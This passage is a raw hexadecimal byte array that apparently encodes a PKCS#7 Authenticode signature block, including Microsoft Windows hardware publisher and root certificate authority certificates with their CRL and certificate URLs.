0x30, 0x2B, 0x06, 0x0B, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x10, 0x02, 0x0C, 0x31, 0x1C, 0x30, 0x1A, 0x30, 0x18, 0x30, 0x16, 0x04, 0x14, 0x03, 0xA5, 0xB1, 0x46, 0x63, 0xEB, 0x12, 0x02, 0x30, 0x91, 0xB8, 0x4A, 0x6D, 0x6A, 0x68, 0xBC, 0x87, 0x1D, 0xE6, 0x6B, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x04, 0x82, 0x01, 0x00, 0x32, 0x73, 0x8E, 0xBB, 0x1E, 0x19, 0x4B, 0x0F, 0x7F, 0xB8, 0x14, 0xD9, 0x9C, 0x51, 0x4B, 0x79, 0xF6, 0xB6, 0xE7, 0x4D, 0x0C, 0xC5, 0x06, 0x70, 0xAC, 0x57, 0xF7, 0xD0, 0x4C, 0x47, 0xC7, 0xCC, 0x9C, 0xD2, 0x70, 0xA0, 0xE9, 0x5A, 0x43, 0x9F, 0xCE, 0x84, 0x22, 0x8F, 0xE9, 0x1D, 0x3C, 0x40, 0xE2, 0x98, 0x8C, 0x4C, 0x03, 0x5D, 0x1C, 0x00, 0x56, 0x15, 0xB6, 0x55, 0xF3, 0x02, 0x87, 0x8A, 0x49, 0xF7, 0x31, 0x19, 0x75, 0x02, 0x10, 0x5B, 0x3F, 0x6D, 0x64, 0x1D, 0x25, 0x9C, 0xB2, 0x98, 0x79, 0xDC, 0xEA, 0xAE, 0xEE, 0x8F, 0x28, 0x53, 0x2C, 0x58, 0x31, 0x7D, 0xC0, 0x71, 0xFC, 0xB2, 0x72, 0x10, 0x29, 0xA4, 0x31, 0x38, 0x02, 0x0C, 0x0A, 0x30, 0x07, 0xBD, 0xD2, 0xC2, 0x08, 0xC1, 0xAF, 0xEB, 0xFB, 0xA3, 0x10, 0xA9, 0x2D, 0xF6, 0xA7, 0x4E, 0x97, 0xCC, 0xA9, 0x03, 0x98, 0xA9, 0x54, 0xCD, 0xC1, 0x8D, 0xCB, 0xAB, 0x0F, 0x33, 0xC6, 0x50, 0x10, 0xAE, 0x69, 0x9E, 0xD3, 0x9E, 0x3C, 0xEC, 0x01, 0xFF, 0x95, 0x6F, 0xD5, 0xE1, 0x39, 0x90, 0xBF, 0x96, 0x84, 0x1C, 0xF8, 0x89, 0x2E, 0xAF, 0x7C, 0xAE, 0xAE, 0x39, 0x91, 0x5A, 0x35, 0xFD, 0x16, 0xF3, 0xFD, 0x55, 0x98, 0xB6, 0xBF, 0x96, 0xCB, 0x25, 0x32, 0xD6, 0xF6, 0x04, 0xC6, 0x3C, 0x1C, 0x3D, 0x57, 0x0D, 0x4E, 0x1A, 0x7C, 0x57, 0x16, 0x90, 0xBA, 0xC1, 0x6D, 0x62, 0x15, 0xA8, 0x33, 0x6C, 0xFB, 0x88, 0x48, 0xC0, 0x51, 0x21, 0x8A, 0x3B, 0x31, 0x7C, 0x9C, 0xA7, 0xFB, 0xBF, 0x61, 0xA0, 0xD2, 0x18, 0xE5, 0x10, 0x47, 0x79, 0x49, 0x92, 0x44, 0x2E, 0x80, 0x70, 0xA3, 0xAB, 0x7C, 0x21, 0xED, 0x4D, 0x68, 0x43, 0x80, 0x27, 0x39, 0x30, 0xB8, 0x37, 0x7F, 0x53, 0x45, 0x6A, 0xC5, 0x25, 0x8A, 0x89, 0xD6, 0xA9, 0x30, 0x82, 0x24, 0x63, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x07, 0x02, 0xA0, 0x82, 0x24, 0x54, 0x30, 0x82, 0x24, 0x50, 0x02, 0x01, 0x01, 0x31, 0x0F, 0x30, 0x0D, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0x30, 0x5C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x04, 0xA0, 0x4E, 0x30, 0x4C, 0x30, 0x17, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x0F, 0x30, 0x09, 0x03, 0x01, 0x00, 0xA0, 0x04, 0xA2, 0x02, 0x80, 0x00, 0x30, 0x31, 0x30, 0x0D, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0x04, 0x20, 0x33, 0xB8, 0x8A, 0xC3, 0x15, 0x1F, 0x21, 0x92, 0xEA, 0xF4, 0xC2, 0xBE, 0x3C, 0x7A, 0xD0, 0x0E, 0x49, 0x09, 0x0C, 0x8B, 0x94, 0xEC, 0x51, 0xB7, 0x54, 0xE1, 0x9A, 0xC7, 0x84, 0xB0, 0x87, 0xAA, 0xA0, 0x82, 0x0D, 0xE4, 0x30, 0x82, 0x06, 0x8C, 0x30, 0x82, 0x04, 0x74, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x13, 0x33, 0x00, 0x00, 0x00, 0x12, 0xB0, 0x54, 0x93, 0xEA, 0xDD, 0xCE, 0xEB, 0x4B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x30, 0x81, 0x8E, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x38, 0x30, 0x36, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x2F, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x54, 0x68, 0x69, 0x72, 0x64, 0x20, 0x50, 0x61, 0x72, 0x74, 0x79, 0x20, 0x43, 0x6F, 0x6D, 0x70, 0x6F, 0x6E, 0x65, 0x6E, 0x74, 0x20, 0x43, 0x41, 0x20, 0x32, 0x30, 0x31, 0x34, 0x30, 0x1E, 0x17, 0x0D, 0x31, 0x36, 0x30, 0x32, 0x31, 0x32, 0x30, 0x30, 0x35, 0x39, 0x34, 0x31, 0x5A, 0x17, 0x0D, 0x31, 0x37, 0x30, 0x35, 0x31, 0x32, 0x30, 0x30, 0x35, 0x39, 0x34, 0x31, 0x5A, 0x30, 0x81, 0xA0, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x0D, 0x30, 0x0B, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x04, 0x4D, 0x4F, 0x50, 0x52, 0x31, 0x3B, 0x30, 0x39, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x32, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x48, 0x61, 0x72, 0x64, 0x77, 0x61, 0x72, 0x65, 0x20, 0x43, 0x6F, 0x6D, 0x70, 0x61, 0x74, 0x69, 0x62, 0x69, 0x6C, 0x69, 0x74, 0x79, 0x20, 0x50, 0x75, 0x62, 0x6C, 0x69, 0x73, 0x68, 0x65, 0x72, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0F, 0x00, 0x30, 0x82, 0x01, 0x0A, 0x02, 0x82, 0x01, 0x01, 0x00, 0x8B, 0xD4, 0x80, 0x41, 0x4F, 0xFF, 0xF0, 0x75, 0x11, 0xC6, 0x6A, 0x1A, 0xC4, 0x66, 0xF8, 0x15, 0x7F, 0x0C, 0xCB, 0xBE, 0x73, 0x43, 0x2E, 0x73, 0x60, 0xC4, 0x18, 0x16, 0x6C, 0x66, 0x2F, 0x8B, 0x05, 0x8F, 0x21, 0x21, 0x20, 0xA2, 0x68, 0x48, 0xF3, 0xAC, 0xF1, 0xDE, 0x8F, 0xBF, 0x31, 0x87, 0xC0, 0x21, 0x27, 0x7B, 0xAD, 0xCE, 0x7B, 0xB7, 0xDD, 0x16, 0x99, 0x39, 0xCC, 0xD1, 0x34, 0x47, 0x39, 0x05, 0x8F, 0x06, 0x99, 0x33, 0x4E, 0x8C, 0x4C, 0x04, 0x71, 0xD7, 0x5B, 0x52, 0x43, 0x03, 0xC3, 0xE1, 0xE3, 0x72, 0x7E, 0xA5, 0xA1, 0x3E, 0x87, 0xE4, 0x9E, 0xE2, 0x48, 0xD0, 0x80, 0x0F, 0xB1, 0x76, 0xEF, 0xFA, 0x4D, 0x75, 0x0B, 0xF0, 0xB7, 0x73, 0x64, 0x8C, 0x1F, 0x5A, 0x2B, 0x32, 0x50, 0x60, 0xFE, 0x57, 0xB9, 0xCE, 0x4E, 0xE2, 0xDC, 0x90, 0x37, 0x1F, 0xF3, 0x38, 0x02, 0xD0, 0x12, 0xFD, 0xD7, 0x34, 0x4E, 0xAF, 0x17, 0xF4, 0xD0, 0x99, 0xA7, 0x1D, 0x46, 0x04, 0x0C, 0x34, 0x91, 0x64, 0x65, 0xBF, 0xBF, 0x72, 0x3E, 0xC4, 0x2C, 0xCA, 0x45, 0x31, 0x76, 0x03, 0xBE, 0xD0, 0x54, 0x96, 0xA7, 0x08, 0xF4, 0xC4, 0x50, 0x17, 0x53, 0xFF, 0x11, 0x5C, 0x3B, 0xA7, 0x5B, 0x41, 0x83, 0xC0, 0x6A, 0x5E, 0xBE, 0x78, 0x29, 0x1B, 0x56, 0x16, 0x76, 0x5F, 0x76, 0x2D, 0x9F, 0x0F, 0xDD, 0x3C, 0x1D, 0xBD, 0x3E, 0xCE, 0x05, 0x47, 0x00, 0x11, 0x5D, 0x06, 0x1C, 0xF3, 0x6C, 0xC5, 0x14, 0x51, 0xA7, 0x9C, 0xCB, 0x2F, 0x2A, 0x1E, 0xF7, 0xA6, 0x74, 0x5C, 0x37, 0x3E, 0x63, 0x0E, 0x46, 0xF2, 0x13, 0xA1, 0x22, 0xA8, 0x74, 0xA1, 0x19, 0x73, 0xCD, 0xB2, 0x76, 0x22, 0x41, 0x39, 0x87, 0x5C, 0x7C, 0x06, 0x27, 0xEC, 0xDB, 0x3C, 0x16, 0xBB, 0x21, 0x33, 0xEF, 0x88, 0x22, 0x7B, 0x02, 0x03, 0x01, 0x00, 0x01, 0xA3, 0x82, 0x01, 0xCD, 0x30, 0x82, 0x01, 0xC9, 0x30, 0x2C, 0x06, 0x03, 0x55, 0x1D, 0x25, 0x04, 0x25, 0x30, 0x23, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x03, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x0A, 0x03, 0x05, 0x06, 0x0B, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x0A, 0x03, 0x05, 0x01, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x1D, 0x0E, 0x04, 0x16, 0x04, 0x14, 0xD4, 0x90, 0x4D, 0x26, 0xB3, 0xC0, 0x8C, 0xC5, 0xD1, 0xBA, 0xFB, 0x49, 0x2B, 0x36, 0x13, 0x51, 0x5F, 0x00, 0x57, 0x41, 0x30, 0x51, 0x06, 0x03, 0x55, 0x1D, 0x11, 0x04, 0x4A, 0x30, 0x48, 0xA4, 0x46, 0x30, 0x44, 0x31, 0x0D, 0x30, 0x0B, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x04, 0x4D, 0x4F, 0x50, 0x52, 0x31, 0x33, 0x30, 0x31, 0x06, 0x03, 0x55, 0x04, 0x05, 0x13, 0x2A, 0x35, 0x32, 0x31, 0x37, 0x34, 0x2B, 0x66, 0x62, 0x66, 0x37, 0x66, 0x65, 0x64, 0x63, 0x2D, 0x32, 0x65, 0x62, 0x38, 0x2D, 0x34, 0x63, 0x62, 0x66, 0x2D, 0x62, 0x30, 0x32, 0x30, 0x2D, 0x66, 0x62, 0x34, 0x37, 0x32, 0x61, 0x39, 0x39, 0x36, 0x34, 0x32, 0x37, 0x30, 0x1F, 0x06, 0x03, 0x55, 0x1D, 0x23, 0x04, 0x18, 0x30, 0x16, 0x80, 0x14, 0xC8, 0x3A, 0x9C, 0xA7, 0x4A, 0xC3, 0x23, 0xF2, 0x25, 0x7E, 0xB9, 0xDA, 0xAB, 0x29, 0x53, 0x0E, 0x54, 0x00, 0xC3, 0xA1, 0x30, 0x74, 0x06, 0x03, 0x55, 0x1D, 0x1F, 0x04, 0x6D, 0x30, 0x6B, 0x30, 0x69, 0xA0, 0x67, 0xA0, 0x65, 0x86, 0x63, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x6B, 0x69, 0x6F, 0x70, 0x73, 0x2F, 0x63, 0x72, 0x6C, 0x2F, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x25, 0x32, 0x30, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x25, 0x32, 0x30, 0x54, 0x68, 0x69, 0x72, 0x64, 0x25, 0x32, 0x30, 0x50, 0x61, 0x72, 0x74, 0x79, 0x25, 0x32, 0x30, 0x43, 0x6F, 0x6D, 0x70, 0x6F, 0x6E, 0x65, 0x6E, 0x74, 0x25, 0x32, 0x30, 0x43, 0x41, 0x25, 0x32, 0x30, 0x32, 0x30, 0x31, 0x34, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x81, 0x81, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01, 0x01, 0x04, 0x75, 0x30, 0x73, 0x30, 0x71, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x02, 0x86, 0x65, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x6B, 0x69, 0x6F, 0x70, 0x73, 0x2F, 0x63, 0x65, 0x72, 0x74, 0x73, 0x2F, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x25, 0x32, 0x30, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x25, 0x32, 0x30, 0x54, 0x68, 0x69, 0x72, 0x64, 0x25, 0x32, 0x30, 0x50, 0x61, 0x72, 0x74, 0x79, 0x25, 0x32, 0x30, 0x43, 0x6F, 0x6D, 0x70, 0x6F, 0x6E, 0x65, 0x6E, 0x74, 0x25, 0x32, 0x30, 0x43, 0x41, 0x25, 0x32, 0x30, 0x32, 0x30, 0x31, 0x34, 0x2E, 0x63, 0x72, 0x74, 0x30, 0x0C, 0x06, 0x03, 0x55, 0x1D, 0x13, 0x01, 0x01, 0xFF, 0x04, 0x02, 0x30, 0x00, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x03, 0x82, 0x02, 0x01, 0x00, 0x02, 0x10, 0x24, 0x4A, 0x38, 0xE6, 0x07, 0x88, 0xC4, 0x90, 0xBB, 0xBA, 0xEE, 0x58, 0xBC, 0x7E, 0x48, 0x62, 0x18, 0xDB, 0xCB, 0x32, 0xA1, 0xE0, 0x0B, 0xC7, 0x75, 0x2D, 0x9C, 0xB4, 0xDA, 0x02, 0x16, 0x2F, 0x15, 0x55, 0x49, 0x18, 0xA8, 0xE8, 0x65, 0x3A, 0xDD, 0x91, 0x0B, 0x57, 0x4E, 0x60, 0xF9, 0x76, 0x31, 0x5E, 0x78, 0x53, 0x1B, 0xF7, 0x98, 0x2A, 0x3F, 0x6C, 0xA0, 0x06, 0xA2, 0xB7, 0xB4, 0xF7, 0x5A, 0x7D, 0xBA, 0x52, 0xDC, 0x2C, 0xC0, 0xA5, 0x8E, 0xEE, 0x6E, 0x9C, 0xD9, 0x8F, 0x5C, 0x39, 0x36, 0xE3, 0x62, 0x60, 0x1A, 0x21, 0x15, 0x89, 0x8F, 0xDE, 0xD8, 0xCB, 0x69, 0xEE, 0xFE, 0x27, 0xFD, 0x5D, 0xA7, 0xBC, 0xB5, 0xD1, 0x8E, 0x9D, 0x69, 0xB8, 0x2E, 0x13, 0x56, 0x0B, 0x4A, 0x74, 0xA8, 0x59, 0xF3, 0xEB, 0xB2, 0x9C, 0xB5, 0x45, 0xAE, 0x37, 0x54, 0x68, 0x19, 0xC9, 0xF0, 0x24, 0xC8, 0x86, 0xE9, 0x99, 0x8C, 0xED, 0x25, 0xFF, 0xDA, 0x26, 0x95, 0xC3, 0x93, 0xD9, 0x14, 0x15, 0x70, 0x7E, 0x90, 0x15, 0x3F, 0x38, 0xBE, 0xB7, 0x7E, 0x4E, 0x84, 0x1F, 0x6B, 0x2B, 0x43, 0x71, 0x23, 0x9E, 0x91, 0x4F, 0xE2, 0xC9, 0x95, 0xEC, 0x1B, 0xC3, 0xE9, 0x5B, 0x16, 0x78, 0xAC, 0x39, 0xA0, 0x7B, 0x84, 0x45, 0x72, 0xA3, 0x64, 0x5B, 0x0A, 0x00, 0x30, 0xFF, 0xF6, 0x4D, 0xC4, 0xD1, 0xFC, 0x5E, 0x20, 0x09, 0x0A, 0x2D, 0x74, 0x10, 0x7F, 0x80, 0x55, 0x64, 0x85, 0x79, 0x41, 0xA0, 0x28, 0x67, 0xD5, 0x82, 0x8A, 0xBE, 0x94, 0xF1, 0xC7, 0xA8, 0x6B, 0x9B, 0xDD, 0x8B, 0x9B, 0x62, 0xD6, 0x96, 0x27, 0xDA, 0xB2, 0x0A, 0xCD, 0x5D, 0xA7, 0xFB, 0x82, 0x56, 0x8A, 0x62, 0x9C, 0xBF, 0xBE, 0xD8, 0x01, 0x4A, 0x6E, 0x3F, 0x0F, 0x5C, 0x08, 0x1C, 0x30, 0x2E, 0xDF, 0x49, 0xB3, 0x30, 0x8A, 0xA7, 0x57, 0x21, 0x75, 0xFA, 0x66, 0xC8, 0x25, 0xBC, 0xBB, 0x41, 0xA6, 0xA2, 0x7F, 0x01, 0xCE, 0x6A, 0x6B, 0x82, 0xDB, 0xA3, 0xB6, 0xF6, 0xB5, 0x53, 0xB1, 0x36, 0x42, 0xBF, 0x92, 0xBC, 0x74, 0xC2, 0x1C, 0xA6, 0xC1, 0xE5, 0x2F, 0x76, 0x63, 0x2B, 0x10, 0x54, 0xB3, 0x58, 0xDD, 0x68, 0xE4, 0x95, 0x7C, 0xDB, 0xD5, 0x81, 0x37, 0x0E, 0x9A, 0xA1, 0x7B, 0x4C, 0xD8, 0xD6, 0x74, 0xCE, 0xF6, 0x2E, 0x1C, 0x13, 0x92, 0xCE, 0xF1, 0x83, 0x48, 0x71, 0xF2, 0x64, 0xB1, 0x16, 0xFD, 0xCD, 0x51, 0x19, 0x9C, 0x51, 0xA9, 0x88, 0xD3, 0x69, 0x09, 0x95, 0xA2, 0xEA, 0x57, 0x15, 0x71, 0x66, 0xB5, 0x22, 0x9B, 0x89, 0xFF, 0xA2, 0xCC, 0x2C, 0x82, 0x88, 0xE4, 0xD7, 0x53, 0x7F, 0xD3, 0x0A, 0x9C, 0x81, 0xCA, 0x92, 0x15, 0x11, 0x62, 0xB8, 0x5D, 0x79, 0x02, 0x8E, 0x97, 0x03, 0xD2, 0xD0, 0x27, 0xC2, 0x30, 0x16, 0x2D, 0x5D, 0x1D, 0x6F, 0xC8, 0xB9, 0x4A, 0xED, 0xDC, 0xE4, 0xE9, 0x0B, 0x89, 0x52, 0x85, 0x71, 0x85, 0xE2, 0xB0, 0xCC, 0x67, 0x0C, 0x80, 0x7A, 0xA8, 0x69, 0xF5, 0xF1, 0xC4, 0x8A, 0x81, 0xDB, 0xE1, 0x84, 0xC3, 0x18, 0x90, 0x6F, 0xB6, 0x33, 0xE5, 0x2C, 0xE3, 0x5F, 0xC3, 0x61, 0xD9, 0x55, 0x51, 0xDC, 0x6E, 0xFA, 0x48, 0x53, 0x8A, 0xB6, 0xEF, 0xDA, 0x8E, 0x91, 0x2C, 0xD3, 0x21, 0x6C, 0x9D, 0x64, 0x2C, 0x25, 0x8A, 0x0F, 0xD0, 0xAA, 0x87, 0xF9, 0x77, 0x4C, 0xDB, 0xF8, 0x5E, 0x11, 0x44, 0x35, 0x85, 0x1C, 0x69, 0x50, 0xE7, 0x5A, 0x0F, 0xDE, 0xB6, 0x06, 0xB2, 0xCA, 0x4E, 0x08, 0x07, 0xF3, 0x6F, 0x02, 0xFD, 0x67, 0x1A, 0x75, 0x77, 0x2D, 0xC5, 0x3A, 0x75, 0x12, 0xB0, 0x96, 0x85, 0x4C, 0x33, 0xFD, 0x0E, 0xCF, 0x8D, 0xF4, 0xED, 0x1B, 0x30, 0x82, 0x07, 0x50, 0x30, 0x82, 0x05, 0x38, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x13, 0x33, 0x00, 0x00, 0x00, 0x0D, 0x69, 0x0D, 0x5D, 0x78, 0x93, 0xD0, 0x76, 0xDF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x30, 0x81, 0x88, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x32, 0x30, 0x30, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x29, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x52, 0x6F, 0x6F, 0x74, 0x20, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x65, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6F, 0x72, 0x69, 0x74, 0x79, 0x20, 0x32, 0x30, 0x31, 0x30, 0x30, 0x1E, 0x17, 0x0D, 0x31, 0x34, 0x31, 0x30, 0x31, 0x35, 0x32, 0x30, 0x33, 0x31, 0x32, 0x37, 0x5A, 0x17, 0x0D, 0x32, 0x39, 0x31, 0x30, 0x31, 0x35, 0x32, 0x30, 0x34, 0x31, 0x32, 0x37, 0x5A, 0x30, 0x81, 0x8E, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x38, 0x30, 0x36, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x2F, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x54, 0x68, 0x69, 0x72, 0x64, 0x20, 0x50, 0x61, 0x72, 0x74, 0x79, 0x20, 0x43, 0x6F, 0x6D, 0x70, 0x6F, 0x6E, 0x65, 0x6E, 0x74, 0x20, 0x43, 0x41, 0x20, 0x32, 0x30, 0x31, 0x34, 0x30, 0x82, 0x02, 0x22, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x02, 0x0F, 0x00, 0x30, 0x82, 0x02, 0x0A, 0x02, 0x82, 0x02, 0x01, 0x00, 0xCB, 0x5F, 0x1E, 0xAB, 0x51, 0xF4, 0xD3, 0x7D, 0x61, 0x2D, 0xD2, 0x19, 0x9A, 0xBD, 0x25, 0xFD, 0x97, 0x5C, 0x75, 0xCD, 0xCC, 0x23, 0xB0, 0x99, 0x55, 0xF2, 0xB9, 0x80, 0x03, 0x36, 0x6A, 0x6F, 0x80, 0xC6, 0x0C, 0xB5, 0xBA, 0x3C, 0x27, 0x45, 0x04, 0x06, 0x15, 0x6B, 0xAD, 0x0E, 0xDE, 0x7E, 0x47, 0xAE, 0x38, 0x03, 0x73, 0x6B, 0x3D, 0x28, 0x13, 0x0D, 0x24, 0x2C, 0x2F, 0x39, 0x18, 0x48, 0xA7, 0x46, 0x5E, 0x08, 0xA9, 0xC4, 0x53, 0x60, 0xC9, 0x8C, 0x30, 0xA3, 0xC6, 0x7D, 0x63, 0x21, 0x46, 0xE0, 0x08, 0x93, 0x2F, 0xB8, 0x95, 0x97, 0x6F, 0x29, 0xFF, 0x79, 0xD8, 0x8E, 0x97, 0x39, 0xC8, 0x33, 0xA3, 0x57, 0x1E, 0x30, 0x72, 0x14, 0xEE, 0xB7, 0x7A, 0x7F, 0xFF, 0x59, 0xDB, 0x35, 0xD0, 0x75, 0xE9, 0xC9, 0xB2, 0x72, 0x9D, 0x56, 0xC1, 0xCB, 0xB7, 0x2C, 0xB7, 0xC7, 0x9B, 0x1E, 0x2F, 0x6B, 0x9D, 0xE0, 0x49, 0x3A, 0x1B, 0xF4, 0x39, 0xD3, 0xBD, 0xA8, 0x0B, 0xA7, 0x69, 0x99, 0x5B, 0x13, 0x1C, 0x4E, 0x67, 0x09, 0x37, 0xAE, 0xA0, 0xA8, 0x26, 0x65, 0x5A, 0xBA, 0x7F, 0xAD, 0xBB, 0x49, 0xCA, 0x89, 0x06, 0x67, 0x22, 0xC5, 0xE8, 0x92, 0x1B, 0x19, 0x8F, 0x02, 0x71, 0x1F, 0x5B, 0xC1, 0x74, 0x24, 0x06, 0xAC, 0xE8, 0x7A, 0x28, 0xA9, 0x68, 0x83, 0xA4, 0x42, 0xBC, 0x2F, 0x24, 0x7E, 0x81, 0xF1, 0x7F, 0x27, 0x64, 0x8F, 0x70, 0x67, 0x68, 0xC3, 0x72, 0xFB, 0x69, 0xD7, 0xE5, 0xF0, 0x0E, 0x2C, 0x22, 0x33, 0xE4, 0x1B, 0xC7, 0x1B, 0xD7, 0x25, 0x4D, 0x2F, 0xFC, 0x76, 0xFB, 0x31, 0x7C, 0xF2, 0x98, 0x9F, 0x8E, 0x1F, 0x6A, 0x99, 0x60, 0xAB, 0xBF, 0xF1, 0x32, 0x0F, 